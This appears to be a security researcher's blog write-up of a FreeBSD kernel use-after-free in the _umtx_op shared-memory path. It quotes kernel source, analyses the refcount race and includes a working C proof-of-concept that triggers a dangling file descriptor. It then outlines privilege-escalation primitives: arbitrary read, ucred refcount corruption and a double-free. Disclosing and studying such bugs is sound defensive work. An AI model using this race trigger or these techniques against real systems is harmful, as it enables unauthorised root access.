FreeBSD 11.0+ Kernel LPE: Userspace Mutexes (umtx) Use-After-Free Race Condition

6th September, 2024

chris

Introduction

Since 11.0-RELEASE, the FreeBSD kernel contained a race condition vulnerability in the _umtx_op syscall leading to an exploitable use-after-free. It affects up to and including the latest release at time of writing, 14.1-RELEASE.

This report discusses the vulnerability in depth and explores exploitation options, leading to one that results in gaining root privileges from any unprivileged user.

I had previously discovered the vulnerability last year sometime, but it's now been publicly discovered and patched by Synacktiv as of September, 2024. As I hadn't done anything with my research beforehand, I'll now share it here.

Vulnerability Overview

FreeBSD 11.0 introduced the _umtx_op syscall for implementing userland threading primitives. The syscall takes an "operation" argument that describes the sub-command to perform. Sub-commands are provided for dealing with mutexes, condition variables, semaphores and other objects one would associate with threading.

One of the _umtx_op sub-commands is UMTX_OP_SHM. This sub-command is used for managing process-wide shared memory handles: creating them, destroying them and looking them up.

This UMTX_OP_SHM sub-command suffers from a race condition when it comes to destroying a shared memory handle and this is the crux of the vulnerability: by racing the destruction of the same handle at the same time, it's possible for the destruction logic to run twice. Racing this with a third thread can result in a file descriptor with a dangling struct shmfd pointer through its f_data field.

An in-depth discussion with full details can be found in the Vulnerability Details section.

Exploitation Options

By reallocating into the UAF hole and interacting with the file descriptor obtained through the vulnerability, we are able to read and write to other structures on the heap. To make use of this, we need to understand what other data we could have reallocated into the hole and then look for interesting ways to manipulate it through the relevant fileops table: shm_ops in this case.

The struct shmfd is allocated from the general purpose heap rather than a dedicated zone, greatly increasing our options for reallocating into the hole. Even with this fact, however, there does not seem to be an immediately straight-forward option here.

A much simpler approach is to leverage the vulnerability to cause a double-free in the kernel. Double-frees are not detected by the FreeBSD kernel and by inducing this condition, we are able to free ourselves from being limited to shm_ops for interacting with the backing data: we are able to alias two completely different objects instead.

Full details of how this works to our advantage are covered in Exploitation.

Vulnerability Details

The prototype for the _umtx_op syscall can be found in /usr/include/sys/umtx.h:

    int _umtx_op(void *obj, int op, u_long val, void *uaddr, void *uaddr2);

The entry point in kernel for this syscall is in sys/kern/kern_umtx.c:

    int
    sys__umtx_op(struct thread *td, struct _umtx_op_args *uap)
    {
            static const struct umtx_copyops *umtx_ops;
    
            umtx_ops = &umtx_native_ops;
    #ifdef __LP64__
            if ((uap->op & (UMTX_OP__32BIT | UMTX_OP__I386)) != 0) {
                    if ((uap->op & UMTX_OP__I386) != 0)
                            umtx_ops = &umtx_native_opsi386;
                    else
                            umtx_ops = &umtx_native_opsx32;
            }
    #elif !defined(__i386__)
            /* We consider UMTX_OP__32BIT a nop on !i386 ILP32. */
            if ((uap->op & UMTX_OP__I386) != 0)
                    umtx_ops = &umtx_native_opsi386;
    #else
            /* Likewise, UMTX_OP__I386 is a nop on i386. */
            if ((uap->op & UMTX_OP__32BIT) != 0)
                    umtx_ops = &umtx_native_opsx32;
    #endif
[1]         return (kern__umtx_op(td, uap->obj, uap->op, uap->val, uap->uaddr1,
                uap->uaddr2, umtx_ops));
    }

Some accommodation for 32-bit processes running on a 64-bit kernel are made here, but otherwise our interest follows to kern__umtx_op [1].

    static int
    kern__umtx_op(struct thread *td, void *obj, int op, unsigned long val,
        void *uaddr1, void *uaddr2, const struct umtx_copyops *ops)
    {
            struct _umtx_op_args uap = {
                    .obj = obj,
                    .op = op & ~UMTX_OP__FLAGS,
                    .val = val,
                    .uaddr1 = uaddr1,
                    .uaddr2 = uaddr2
            };
    
            if ((uap.op >= nitems(op_table)))
                    return (EINVAL);
[2]         return ((*op_table[uap.op])(td, &uap, ops));
    }

This function very simply prepares an argument structure and calls off into a function pointer from the op_table table [2]. Looking at this table, we can see a full list of all of the supported operations:

    static const _umtx_op_func op_table[] = {
    #ifdef COMPAT_FREEBSD10
            [UMTX_OP_LOCK]          = __umtx_op_lock_umtx,
            [UMTX_OP_UNLOCK]        = __umtx_op_unlock_umtx,
    #else
            [UMTX_OP_LOCK]          = __umtx_op_unimpl,
            [UMTX_OP_UNLOCK]        = __umtx_op_unimpl,
    #endif
            [UMTX_OP_WAIT]          = __umtx_op_wait,
            [UMTX_OP_WAKE]          = __umtx_op_wake,
            [UMTX_OP_MUTEX_TRYLOCK] = __umtx_op_trylock_umutex,
            [UMTX_OP_MUTEX_LOCK]    = __umtx_op_lock_umutex,
            [UMTX_OP_MUTEX_UNLOCK]  = __umtx_op_unlock_umutex,
            [UMTX_OP_SET_CEILING]   = __umtx_op_set_ceiling,
            [UMTX_OP_CV_WAIT]       = __umtx_op_cv_wait,
            [UMTX_OP_CV_SIGNAL]     = __umtx_op_cv_signal,
            [UMTX_OP_CV_BROADCAST]  = __umtx_op_cv_broadcast,
            [UMTX_OP_WAIT_UINT]     = __umtx_op_wait_uint,
            [UMTX_OP_RW_RDLOCK]     = __umtx_op_rw_rdlock,
            [UMTX_OP_RW_WRLOCK]     = __umtx_op_rw_wrlock,
            [UMTX_OP_RW_UNLOCK]     = __umtx_op_rw_unlock,
            [UMTX_OP_WAIT_UINT_PRIVATE] = __umtx_op_wait_uint_private,
            [UMTX_OP_WAKE_PRIVATE]  = __umtx_op_wake_private,
            [UMTX_OP_MUTEX_WAIT]    = __umtx_op_wait_umutex,
            [UMTX_OP_MUTEX_WAKE]    = __umtx_op_wake_umutex,
    #if defined(COMPAT_FREEBSD9) || defined(COMPAT_FREEBSD10)
            [UMTX_OP_SEM_WAIT]      = __umtx_op_sem_wait,
            [UMTX_OP_SEM_WAKE]      = __umtx_op_sem_wake,
    #else
            [UMTX_OP_SEM_WAIT]      = __umtx_op_unimpl,
            [UMTX_OP_SEM_WAKE]      = __umtx_op_unimpl,
    #endif
            [UMTX_OP_NWAKE_PRIVATE] = __umtx_op_nwake_private,
            [UMTX_OP_MUTEX_WAKE2]   = __umtx_op_wake2_umutex,
            [UMTX_OP_SEM2_WAIT]     = __umtx_op_sem2_wait,
            [UMTX_OP_SEM2_WAKE]     = __umtx_op_sem2_wake,
[3]         [UMTX_OP_SHM]           = __umtx_op_shm,
            [UMTX_OP_ROBUST_LISTS]  = __umtx_op_robust_lists,
            [UMTX_OP_GET_MIN_TIMEOUT] = __umtx_op_get_min_timeout,
            [UMTX_OP_SET_MIN_TIMEOUT] = __umtx_op_set_min_timeout,
    };

This gives us a good idea of what the _umtx_op syscall is really about. For the purpose of this vulnerability, we're interested in the UMTX_OP_SHM operation, which is implemented by __umtx_op_shm [3].

`UMTX_OP_SHM`

__umtx_op_shm extracts the two key parameters that came in from the _umtx_op syscall and passes them down to umtx_shm:

    static int
    __umtx_op_shm(struct thread *td, struct _umtx_op_args *uap,
        const struct umtx_copyops *ops __unused)
    {
    
            return (umtx_shm(td, uap->uaddr1, uap->val));
    }

umtx_shm is where the main logic lives:

    static int
[1] umtx_shm(struct thread *td, void *addr, u_int flags)
    {
            struct umtx_key key;
            struct umtx_shm_reg *reg;
            struct file *fp;
            int error, fd;
    
[2]         if (__bitcount(flags & (UMTX_SHM_CREAT | UMTX_SHM_LOOKUP |
                UMTX_SHM_DESTROY| UMTX_SHM_ALIVE)) != 1)
                    return (EINVAL);
            if ((flags & UMTX_SHM_ALIVE) != 0)
                    return (umtx_shm_alive(td, addr));
[3]         error = umtx_key_get(addr, TYPE_SHM, PROCESS_SHARE, &key);
            if (error != 0)
                    return (error);
            KASSERT(key.shared == 1, ("non-shared key"));
            if ((flags & UMTX_SHM_CREAT) != 0) {
[4]                 error = umtx_shm_create_reg(td, &key, &reg);
            } else {
[5]                 reg = umtx_shm_find_reg(&key);
                    if (reg == NULL)
                            error = ESRCH;
            }
            umtx_key_release(&key);
            if (error != 0)
                    return (error);
            KASSERT(reg != NULL, ("no reg"));
            if ((flags & UMTX_SHM_DESTROY) != 0) {
[6]                 umtx_shm_unref_reg(reg, true);
            } else {
    #if 0
    #ifdef MAC
                    error = mac_posixshm_check_open(td->td_ucred,
                        reg->ushm_obj, FFLAGS(O_RDWR));
                    if (error == 0)
    #endif
                            error = shm_access(reg->ushm_obj, td->td_ucred,
                                FFLAGS(O_RDWR));
                    if (error == 0)
    #endif
[7]                         error = falloc_caps(td, &fp, &fd, O_CLOEXEC, NULL);
                    if (error == 0) {
                            shm_hold(reg->ushm_obj);
[8]                         finit(fp, FFLAGS(O_RDWR), DTYPE_SHM, reg->ushm_obj,
                                &shm_ops);
                            td->td_retval[0] = fd;
                            fdrop(fp, td);
                    }
            }
[9]         umtx_shm_unref_reg(reg, false);
            return (error);
    }

This function isn't too long, but there are a few paths that we need to understand here. At a high level and before diving into details, it's useful to know that the whole purpose of this UMTX_SHM_OP is to manage a registry of shared memory regions: it lets us create new regions and look up or destroy existing ones.

Beginning with the function signature [1], we see that our controlled inputs to the function are pretty simple: void *addr and u_int flags.

umtx shared memory regions are identified/keyed by virtual addresses in our process and that's what addr is here. It doesn't matter what's stored at addr in our process — we just have to provide some memory address as a key.

flags is used to communicate what we want to do to the region mapped to that addr. It must be one of [2]:

UMTX_SHM_CREAT: Create a new SHM
UMTX_SHM_LOOKUP: Look up an existing SHM
UMTX_SHM_DESTROY: Destroy an existing SHM
UMTX_SHM_ALIVE: Probe if an address maps to a SHM

We will ignore UMTX_SHM_ALIVE here because it's largely uninteresting.

With flags validated to just be one of these, the kernel then translates addr to a umtx_key [3] and begins doing work based on what was asked.

For UMTX_SHM_CREAT, the kernel uses umtx_shm_create_reg to allocate a fresh umtx_shm_reg:

    struct umtx_shm_reg {
            TAILQ_ENTRY(umtx_shm_reg) ushm_reg_link;
            LIST_ENTRY(umtx_shm_reg) ushm_obj_link;
            struct umtx_key         ushm_key;
            struct ucred            *ushm_cred;
            struct shmfd            *ushm_obj;
            u_int                   ushm_refcnt;
            u_int                   ushm_flags;
    };

This is the structure that's part of the global linked list of shared memory regions. There are some important fields to pay particular attention to here:

ushm_refcnt is a refcount for the entry.
ushm_obj is the actual shared memory object attached to the registry.

The ushm_obj can live longer than its registry entry, so it has its own refcount (->shm_refs).

The umtx_shm_create_reg function will create a new shmfd with ->shm_refs == 1 and a new umtx_shm_reg with ushm_refcnt == 2. The refcount is 2 because we have one reference in the registry list and one for the caller.

If instead of UMTX_SHM_CREAT the kernel is servicing a UMTX_SHM_LOOKUP or UMTX_SHM_DESTROY action then an existing SHM needs to be resolved with umtx_shm_find_reg [5].

If that function succeeds in finding one, it takes a reference on ->ushm_refcnt and returns it.

Either way, if no error occurred then the kernel will now have a umtx_shm_reg pointer and own one reference.

Continuing on in the code, if the requested action was UMTX_SHM_DESTROY then umtx_shm_unref_reg is called with its last argument as true [6]. This function decrements the ->ushm_refcnt and if the last argument is true then it also removes it from the registry.

Otherwise, for UMTX_SHM_CREAT or UMTX_SHM_LOOKUP, the kernel allocates a new file descriptor [7] and attaches the struct shmfd from the registry entry to the file [8].

Since a pointer to the struct shmfd is being stored on the file, a reference on that object is taken with shm_hold.

Finally we reach umtx_shm_unref_reg for all 3 of these actions [9]: this drops the refcount taken when it was looked up or created.

Refcounting and Locking

Referring back to the code in the previous subsection, it's interesting to note that locking is only performed when creating or looking for a umtx_shm_reg.

For example, to look up an existing umtx_shm_reg, the kernel uses umtx_shm_find_reg:

    static struct umtx_shm_reg *
    umtx_shm_find_reg(const struct umtx_key *key)
    {
            struct umtx_shm_reg *reg;
    
            mtx_lock(&umtx_shm_lock);
            reg = umtx_shm_find_reg_locked(key);
            mtx_unlock(&umtx_shm_lock);
            return (reg);
    }

Similarly, when a reference is dropped on the umtx_shm_reg, locking is done internally:

    static bool
    umtx_shm_unref_reg_locked(struct umtx_shm_reg *reg, bool force)
    {
            bool res;
    
            mtx_assert(&umtx_shm_lock, MA_OWNED);
            KASSERT(reg->ushm_refcnt > 0, ("ushm_reg %p refcnt 0", reg));
            reg->ushm_refcnt--;
            res = reg->ushm_refcnt == 0;
            if (res || force) {
                    if ((reg->ushm_flags & USHMF_REG_LINKED) != 0) {
                            TAILQ_REMOVE(&umtx_shm_registry[reg->ushm_key.hash],
                                reg, ushm_reg_link);
                            reg->ushm_flags &= ~USHMF_REG_LINKED;
                    }
                    if ((reg->ushm_flags & USHMF_OBJ_LINKED) != 0) {
                            LIST_REMOVE(reg, ushm_obj_link);
                            reg->ushm_flags &= ~USHMF_OBJ_LINKED;
                    }
            }
            return (res);
    }
    
    static void
    umtx_shm_unref_reg(struct umtx_shm_reg *reg, bool force)
    {
            vm_object_t object;
            bool dofree;
    
            if (force) {
                    object = reg->ushm_obj->shm_object;
                    VM_OBJECT_WLOCK(object);
                    vm_object_set_flag(object, OBJ_UMTXDEAD);
                    VM_OBJECT_WUNLOCK(object);
            }
            mtx_lock(&umtx_shm_lock);
            dofree = umtx_shm_unref_reg_locked(reg, force);
            mtx_unlock(&umtx_shm_lock);
            if (dofree)
                    umtx_shm_free_reg(reg);
    }

This locking ensures that the reference counting is consistent amongst other things, but it also fails to protect umtx_shm_find_reg from finding a umtx_shm_reg that's in the process of being destroyed.

Consider what happens when UMTX_SHM_DESTROY is serviced:

umtx_shm_reg is found with umtx_shm_find_reg (->ushm_refcnt++)
umtx_shm_unref_reg called with force == true (->ushm_refcnt--)
umtx_shm_unref_reg called with force == false (->ushm_refcnt--)

The net effect of this operation is to decrease ushm_refcnt by 1. Until step 2 is completed, however, it's still possible to find the same umtx_shm_reg with umtx_shm_find_reg.

Therefore, by racing two concurrent UMTX_SHM_DESTROY actions for the same addr, it's possible to have a net effect of decreasing the ushm_refcnt by 2 instead.

This is the core vulnerability.

Refcount Analysis

By considering two concurrent threads, Thread A and Thread B, both executing a UMTX_SHM_DESTROY for the same SHM, we can see how the refcount value fluctuates.

We start with a simple umtx_shm_reg in the registry. In this state, ->ushm_refcnt == 1 and ->ushm_obj->shm_refs == 1.

We will use the numbered steps for our analysis:

umtx_shm_find_reg => ->ushm_refcnt++
umtx_shm_unref_reg(..., true) => ->ushm_refcnt--
umtx_shm_unref_reg(..., false) => ->ushm_refcnt--

One possible scenario is:

Thread A: Step 1 => ->ushm_refcnt++ => ->ushm_refcnt == 2
Thread B: Step 1 => ->ushm_refcnt++ => ->ushm_refcnt == 3
Thread A: Step 2 => ->ushm_refcnt-- => ->ushm_refcnt == 2
Thread B: Step 2 => ->ushm_refcnt-- => ->ushm_refcnt == 1
Thread A: Step 3 => ->ushm_refcnt-- => ->ushm_refcnt == 0 => umtx_shm_reg FREED
- As umtx_shm_reg is freed, shm_drop is done on ->ushm_obj
- ->ushm_obj->shm_refs-- => ->ushm_obj->shm_refs == 0 => shmfd FREED
Thread B: Step 3 => ->ushm_refcnt-- => ->ushm_refcnt == -1 (on freed data)

There are only a couple of ways this race can play out because if either thread hits Step 2 before the other hits Step 1, the ushm_mtx_reg won't be found. So this is really the only possible net effect of the race: the last umtx_shm_unref_reg operates on freed data.

Introducing a Third Thread

The discovery that the final umtx_shm_unref_reg operates on freed data is only mildly interesting on first glance. Surely to be of use we'd have to race an allocation before that last call and have the decrement be meaningful?

Consider instead what happens if we introduce a third thread to this race — but this time the thread is performing a UMTX_SHM_LOOKUP:

Thread A: Step 1 => ->ushm_refcnt++ => ->ushm_refcnt == 2
Thread B: Step 1 => ->ushm_refcnt++ => ->ushm_refcnt == 3
Thread C: umtx_shm_find_reg => ->ushm_refcnt++ => ->ushm_refcnt == 4
Thread A: Step 2 => ->ushm_refcnt-- => ->ushm_refcnt == 3
Thread B: Step 2 => ->ushm_refcnt-- => ->ushm_refcnt == 2
Thread A: Step 3 => ->ushm_refcnt-- => ->ushm_refcnt == 1
Thread B: Step 3 => ->ushm_refcnt-- => ->ushm_refcnt == 0 => umtx_shm_reg is FREED
- As umtx_shm_reg is freed, shm_drop is done on ->ushm_obj
- ->ushm_obj->shm_refs-- => ->ushm_obj->shm_refs == 0 => shmfd FREED
Thread C:
- Allocate fd in process (falloc_caps)

Now because Thread B reached Step 3 before Thread C could call shm_hold, Thread C has allocated a file in the process with a dangling f_data: it points to the freed struct shmfd.

It is of course possible for this race to turn out differently: Thread C could call shm_hold before Thread B hits Step 3, in which case f_data will not be dangling.

We can detect the right condition by inspecting the file we get back from Thread C. But before we even do that, we need to check that:

_umtx_op(UMTX_SHM_DESTROY) in Thread A returned 0 (=> success).
_umtx_op(UMTX_SHM_DESTROY) in Thread B returned 0 (=> success).
_umtx_op(UMTX_SHM_LOOKUP) in Thread C returned >0 (=> success, file descriptor returned).

When all of these conditions are detected, we can then try to trigger a controlled allocation into the correct kernel malloc bucket and read some value from our file descriptor to see if it contains a value we chose.

Looking at shmfd, there are a few candidate fields:

    struct shmfd {
            vm_ooffset_t    shm_size;
            vm_object_t     shm_object;
            vm_pindex_t     shm_pages;      /* allocated pages */
            int             shm_refs;
            uid_t           shm_uid;
            gid_t           shm_gid;
            mode_t          shm_mode;
            int             shm_kmappings;
    
            /*
             * Values maintained solely to make this a better-behaved file
             * descriptor for fstat() to run on.
             */
            struct timespec shm_atime;
            struct timespec shm_mtime;
            struct timespec shm_ctime;
            struct timespec shm_birthtime;
            ino_t           shm_ino;
    
            struct label    *shm_label;             /* MAC label */
            const char      *shm_path;
    
            struct rangelock shm_rl;
            struct mtx      shm_mtx;
    
            int             shm_flags;
            int             shm_seals;
    
            /* largepage config */
            int             shm_lp_psind;
            int             shm_lp_alloc_policy;
    };

Reading out of them requires using a function from the shm_ops table:

    struct fileops shm_ops = {
            .fo_read = shm_read,
            .fo_write = shm_write,
            .fo_truncate = shm_truncate,
            .fo_ioctl = shm_ioctl,
            .fo_poll = invfo_poll,
            .fo_kqfilter = invfo_kqfilter,
            .fo_stat = shm_stat,
            .fo_close = shm_close,
            .fo_chmod = shm_chmod,
            .fo_chown = shm_chown,
            .fo_sendfile = vn_sendfile,
            .fo_seek = shm_seek,
            .fo_fill_kinfo = shm_fill_kinfo,
            .fo_mmap = shm_mmap,
            .fo_get_seals = shm_get_seals,
            .fo_add_seals = shm_add_seals,
            .fo_fallocate = shm_fallocate,
            .fo_fspacectl = shm_fspacectl,
            .fo_flags = DFLAG_PASSABLE | DFLAG_SEEKABLE,
    };

We do need to be careful, however: some of these functions will attempt to interact with structures such as the struct rangelock — and these are expected to contain legitimate kernel pointers.

The shm_get_seals function is one good candidate, which can be invoked through fcntl(fd, F_GET_SEALS) and simply returns the value of ->shm_seals. It should be noted that this field isn't present on older versions of FreeBSD, however.

One field that has existed since _umtx_op was first introduced is shm_mode. This is the file permissions mode of the shmfd and it's initialised to O_RDWR when a shmfd is allocated by umtx_shm_create_reg:

    static int
    umtx_shm_create_reg(struct thread *td, const struct umtx_key *key,
        struct umtx_shm_reg **res)
    {
            struct umtx_shm_reg *reg, *reg1;
    ...
            reg = uma_zalloc(umtx_shm_reg_zone, M_WAITOK | M_ZERO);
            reg->ushm_refcnt = 1;
            bcopy(key, &reg->ushm_key, sizeof(*key));
            reg->ushm_obj = shm_alloc(td->td_ucred, O_RDWR, false);
    ...

Attempting to fchmod (via shm_chmod) to the same mode will always succeed, but if we've replaced the shm_mode field with something like zeroes, this will fail.

Therefore, once we've observed the desired return values from _umtx_op across all 3 threads, our next steps should be:

Try to force a kernel allocation of zeroes.
Attempt to fchmod(thread_c_result, O_RDWR).

If the fchmod fails then we know that we've triggered the exact sequence of thread execution that we need.

Strategy Proof-of-Concept

With a strategy in hand, we can now write a proof-of-concept that should trigger the vulnerability.

We will assume a modern version of FreeBSD and opt to read the shm_seals field to detect a successful kernel allocation. For simplicity, we will use a bogus ioctl(2) call to attempt a controlled allocation into the correct bucket.

The ioctl(2) technique only gives a transient allocation — enough to place data for a test — but we will use something more stable, such as cap_ioctls_limit when building a functioning exploit (discussed later).

The code for the strategy PoC is:

/*
 * cc -pthread -o umtx-poc umtx-poc.c
 */
#define _WANT_FILE

#include <err.h>
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/cpuset.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/umtx.h>
#include <unistd.h>

static volatile int a_ready = 0;
static volatile int b_ready = 0;
static volatile int c_ready = 0;
static volatile int a_result = 0;
static volatile int b_result = 0;
static volatile int c_result = 0;

static void
pin_thread_to_cpu(int which)
{
        cpuset_t cs;

        CPU_ZERO(&cs);
        CPU_SET(which, &cs);

        if (-1 == cpuset_setaffinity(CPU_LEVEL_WHICH, CPU_WHICH_TID, -1, sizeof(cs), &cs))
                err(1, "[%s] cpuset_setaffinity", __FUNCTION__);
}

static void *
thread_a(void *key)
{
        pin_thread_to_cpu(1);

        a_ready = 1;
        while (!b_ready && !c_ready);

        a_result = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_DESTROY, key, NULL);
        return NULL;
}

static void *
thread_b(void *key)
{
        pin_thread_to_cpu(2);

        b_ready = 1;
        while (!a_ready && !c_ready);

        b_result = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_DESTROY, key, NULL);
        return NULL;
}

static void *
thread_c(void *key)
{
        pin_thread_to_cpu(0);

        c_ready = 1;
        while (!a_ready && !b_ready);

        c_result = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_LOOKUP, key, NULL);
        return NULL;
}

int
main(int argc, char *argv[])
{
        char key = 0;
        pthread_t ta;
        pthread_t tb;
        pthread_t tc;
        unsigned char aaaa_buffer[sizeof(struct shmfd)];
        int seals;
        int shmfd;

        /* prepare the spray buffer. */
        memset(aaaa_buffer, 0x41, sizeof(aaaa_buffer));

        /* pin to same CPU as Thread C: */
        pin_thread_to_cpu(0);

        printf("[+] racing...\n");
        for (;;) {
                a_ready = 0;
                b_ready = 0;
                c_ready = 0;
                a_result = 0;
                b_result = 0;
                c_result = 0;

                /* create a SHM for the threads to find, but close the fd. */
                if (-1 == (shmfd = _umtx_op(NULL, UMTX_OP_SHM, UMTX_SHM_CREAT, &key, NULL)))
                        err(1, "[%s] _umtx_op", __FUNCTION__);

                close(shmfd);

                if (pthread_create(&ta, NULL, thread_a, &key) ||
                    pthread_create(&tb, NULL, thread_b, &key) ||
                    pthread_create(&tc, NULL, thread_c, &key))
                        errx(1, "[%s] pthread_create failed", __FUNCTION__);

                if (pthread_join(ta, NULL) ||
                    pthread_join(tb, NULL) ||
                    pthread_join(tc, NULL))
                        errx(1, "[%s] pthread_join failed", __FUNCTION__);

                if (!a_result && !b_result && c_result > 0) {
                        /* check if we now have a dangling shmfd in c_result: */
                        ioctl(-1, _IOW(0, 0, aaaa_buffer), aaaa_buffer);
                        if (0x41414141 == (seals = fcntl(c_result, F_GET_SEALS))) {
                                printf("[+] success! shm_seals: 0x%x\n", seals);
                                break;
                        }
                }

                close(c_result);
        }

        return 0;
}

This works as expected:

$ cc -pthread -o umtx-poc umtx-poc.c && ./umtx-poc
[+] racing...            
[+] success! shm_seals: 0x41414141

Exploitation

Triggering the umtx vulnerability leaves us in a state where we have a file descriptor to a file that has a freed struct shmfd hanging from its f_data pointer. As demonstrated at the end of the previous section, we can trivially reallocate into this freed memory and observe the effects.

The shape of a struct shmfd on the latest release at time of writing is:

    struct shmfd {
            vm_ooffset_t    shm_size;
[1]         vm_object_t     shm_object;
            vm_pindex_t     shm_pages;      /* allocated pages */
            int             shm_refs;
            uid_t           shm_uid;
            gid_t           shm_gid;
            mode_t          shm_mode;
            int             shm_kmappings;
    
            /*
             * Values maintained solely to make this a better-behaved file
             * descriptor for fstat() to run on.
             */
            struct timespec shm_atime;
            struct timespec shm_mtime;
            struct timespec shm_ctime;
            struct timespec shm_birthtime;
            ino_t           shm_ino;
    
            struct label    *shm_label;             /* MAC label */
[2]         const char      *shm_path;
    
            struct rangelock shm_rl;
            struct mtx      shm_mtx;
    
            int             shm_flags;
            int             shm_seals;
    
            /* largepage config */
            int             shm_lp_psind;
            int             shm_lp_alloc_policy;
    };

This is an interesting structure to have control over. Some example fields that could be useful:

shm_object: This will be a dangling vm_object_t pointer. Reallocating that vm_object_t could provide a nice primitive: e.g. if we can have it reallocated as the vm_object_t backing a file that we're only able to open for O_RDONLY, the permissions we have on the shmfd (in shm_mode) may allow us to mmap the file as PROT_READ | PROT_WRITE. Using this to gain write access to something like /etc/libmap.conf would lead to a trivial privilege escalation.
shm_path: We can gain an arbitrary read through this pointer by controlling it and calling fcntl(fd, F_KINFO). That ends up reaching shm_fill_kinfo_locked, which will do a strlcpy from that address into a buffer to return to userland. Systematically increasing that shm_path then allows us to read onwards past '\0' bytes.

Many of the ways we interact with this file descriptor will result in one of the specialised fileops functions being called. For this specific type of file, the relevant fileops table is shm_ops:

    struct fileops shm_ops = {
            .fo_read = shm_read,
            .fo_write = shm_write,
            .fo_truncate = shm_truncate,
            .fo_ioctl = shm_ioctl,
            .fo_poll = invfo_poll,
            .fo_kqfilter = invfo_kqfilter,
            .fo_stat = shm_stat,
            .fo_close = shm_close,
            .fo_chmod = shm_chmod,
            .fo_chown = shm_chown,
            .fo_sendfile = vn_sendfile,
            .fo_seek = shm_seek,
            .fo_fill_kinfo = shm_fill_kinfo,
            .fo_mmap = shm_mmap,
            .fo_get_seals = shm_get_seals,
            .fo_add_seals = shm_add_seals,
            .fo_fallocate = shm_fallocate,
            .fo_fspacectl = shm_fspacectl,
            .fo_flags = DFLAG_PASSABLE | DFLAG_SEEKABLE,
    };

As noted in the previous section, many of these functions interact with the struct shmfd in a way that expects valid kernel pointers to exist. This complicates things for targeting some of the shmfd fields. For example, many of the operations will try to acquire a range lock, interacting with queues and pointers on both shm_rl and shm_mtx.

Kernel information disclosure vulnerabilities are not rare on FreeBSD, but it still feels sub-optimal to rely on further vulnerabilities to make good use of this bug.

Writing through `shm_uid` / `shm_gid`

One of the shm_ops functions that avoids referencing pointers from the shmfd struct is shm_chown:

    static int
    shm_chown(struct file *fp, uid_t uid, gid_t gid, struct ucred *active_cred,
        struct thread *td)
    {
            struct shmfd *shmfd;
            int error;
    
            error = 0;
[1]         shmfd = fp->f_data;
            mtx_lock(&shm_timestamp_lock);
    #ifdef MAC
            error = mac_posixshm_check_setowner(active_cred, shmfd, uid, gid);
            if (error != 0)
                    goto out;
    #endif
[2]         if (uid == (uid_t)-1)
                    uid = shmfd->shm_uid;
[3]         if (gid == (gid_t)-1)
                     gid = shmfd->shm_gid;
            if (((uid != shmfd->shm_uid && uid != active_cred->cr_uid) ||
[4]             (gid != shmfd->shm_gid && !groupmember(gid, active_cred))) &&
                (error = priv_check_cred(active_cred, PRIV_VFS_CHOWN)))
                    goto out;
[5]         shmfd->shm_uid = uid;
[6]         shmfd->shm_gid = gid;
    out:
            mtx_unlock(&shm_timestamp_lock);
            return (error);
    }

This function provides the implementation of fchown for a shmfd and is fairly simple. First, the shmfd pointer (pointer to the freed data we can control) is taken at [1]. The uid and gid arguments to fchown are considered next: we can pass -1 as either of these to leave each value unchanged, which is handled at [2] and [3].

Next is a permissions check. If we're attempting to change shm_uid to anything other than our current cr_uid, or if we're trying to change shm_gid to a group to which we're not a member [4], then this will fail. Otherwise the fields are written [5], [6].

Targeting shm_uid and shm_gid this way is potentially interesting: whatever value happens to be in memory for those fields can be replaced with our current uid and gid (or any gid we're a member of).

We would have to find a useful struct to allocate into this memory that has a useful field at the shm_uid and shm_gid offsets, of course.

Looking at the size of struct shmfd, we can see that struct ucred comes from the same bucket — and ucreds are astonishingly allocated from the general purpose heap instead of a dedicated zone in FreeBSD:

user@freebsd:~ $ lldb /boot/kernel/kernel
(lldb) target create "/boot/kernel/kernel"
Current executable set to '/boot/kernel/kernel' (x86_64).
(lldb) p sizeof(struct shmfd)
(unsigned long) $0 = 208
(lldb) p sizeof(struct ucred)
(unsigned long) $1 = 256

shm_gid happens to overlap the cr_ref refcount field of ucred:

(lldb) p &((struct shmfd *)0)->shm_gid
(gid_t *) $2 = 0x0000000000000020
(lldb) p &((struct ucred *)0)->cr_ref
(u_int *) $3 = 0x0000000000000020

This means that by allocating into the shmfd hole with a ucred, we can change the refcount of that ucred to whatever our gid happens to be. By changing the refcount to be lower than it should be, we can then trigger a premature free of the ucred and reallocate a new credential of our choosing into that hole.

There are many ways to bump the refcount of a ucred; a simple technique is to make lots of threads. Each created thread will add to the refcount and reaping will take from it.

While this strategy seems workable, it is somewhat brittle as it relies on these two structures always overlapping in a fruitful way. Rather than continue with this, I opted to focus on a different approach and instead turn the bug into a double-free. This provides us with a much richer exploitable state.

Expanding Options via Double-Free

The FreeBSD kernel does not detect double-frees. This is useful because if we're able to turn our use-after-free into a double-free, it expands the set of objects that we're able to alias: we would no longer be restricted to considering what can be manipulated through shm_ops, but instead through whichever other types we're able to combine.

The FreeBSD kernel heap allocator works in a LIFO fashion. This still applies for double-freed elements, too: if we free the same virtual address twice then the next two allocations from malloc will return that same virtual address. This behaviour lets us alias any two objects that come from the same bucket.

In investigating how we might be able to free our dangling shmfd again, it's tempting to consider placing a fake shmfd using a kernel reallocation primitive (e.g ioctl as we used in Strategy Proof-of-Concept) and ensuring the shm_refs field is set to 1.

Then, by calling close on our file descriptor, we'll cause the kernel to call shm_close on our file, which simply does shm_drop on our prepared data:

    void
    shm_drop(struct shmfd *shmfd)
    {
            vm_object_t obj;
    
            if (refcount_release(&shmfd->shm_refs)) {
    #ifdef MAC
                    mac_posixshm_destroy(shmfd);
    #endif
                    rangelock_destroy(&shmfd->shm_rl);
                    mtx_destroy(&shmfd->shm_mtx);
                    obj = shmfd->shm_object;
                    if (!shm_largepage(shmfd)) {
                            VM_OBJECT_WLOCK(obj);
                            obj->un_pager.swp.swp_priv = NULL;
                            VM_OBJECT_WUNLOCK(obj);
                    }
                    vm_object_deallocate(obj);
[1]                 free(shmfd, M_SHMFD);
            }
    }

We really just want to reach that free at [1], but in order to get there, the kernel will be interacting with various other fields such as shm_object. shm_object is expected to be a legitimate kernel pointer and since it's located before the shm_refs field, we're obliged to provide a value if we plan on placing a fake shmfd.

It turns out that there's a different route we can take to triggering this free at [1].

